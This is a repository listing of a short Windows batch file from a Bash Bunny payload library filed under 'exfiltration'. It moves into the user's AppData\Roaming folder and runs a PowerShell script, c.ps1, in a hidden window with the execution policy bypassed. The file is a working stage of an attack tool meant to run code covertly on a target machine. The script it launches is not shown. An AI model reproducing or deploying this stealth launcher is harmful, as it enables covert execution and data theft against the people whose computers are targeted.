Files
bashbunny-payloads/payloads/library/exfiltration/Copy-And-Waste/I.bat
2022-08-23 21:44:25 -04:00

4 lines
136 B
Batchfile

@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause